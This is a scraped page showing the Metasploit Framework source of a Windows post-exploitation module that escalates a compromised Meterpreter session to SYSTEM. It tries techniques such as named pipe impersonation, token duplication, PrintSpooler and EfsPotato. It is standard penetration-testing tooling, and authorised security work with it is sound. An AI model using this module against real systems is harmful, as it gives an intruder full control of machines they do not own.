Path: blob/master/modules/post/windows/escalate/getsystem.rb
58083 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'metasm'67class MetasploitModule < Msf::Post8include Msf::Post::Windows::Priv910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Windows Escalation',15'Description' => %q{16This module uses the `getsystem` command to escalate the current session to the SYSTEM account using various17techniques.18},19'License' => MSF_LICENSE,20'Author' => 'hdm',21'References' => [22['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION],23['ATT&CK', Mitre::Attack::Technique::T1548_002_BYPASS_USER_ACCOUNT_CONTROL]24],25'Platform' => [ 'win' ],26'SessionTypes' => [ 'meterpreter' ],27'Compat' => {28'Meterpreter' => {29'Commands' => %w[30priv_elevate_getsystem31]32}33},34'Notes' => {35'AKA' => [36'Named Pipe Impersonation',37'Token Duplication',38'RPCSS',39'PrintSpooler',40'EFSRPC',41'EfsPotato'42],43'Stability' => [CRASH_SAFE],44'SideEffects' => [],45'Reliability' => []46}47)48)4950register_options([51OptInt.new('TECHNIQUE', [false, 'Specify a particular technique to use (1-6), otherwise try them all', 0])52])53end5455def unsupported56print_error('This platform is not supported with this script!')57raise Rex::Script::Completed58end5960def run61technique = datastore['TECHNIQUE'].to_i6263unsupported if client.platform != 'windows' || (client.arch != ARCH_X64 && client.arch != ARCH_X86)6465if is_system?66print_good('This session already has SYSTEM privileges')67return68end6970begin71result = client.priv.getsystem(technique)72print_good("Obtained SYSTEM via technique #{result[1]}")73rescue Rex::Post::Meterpreter::RequestError74print_error('Failed to obtain SYSTEM access')75end76end77end787980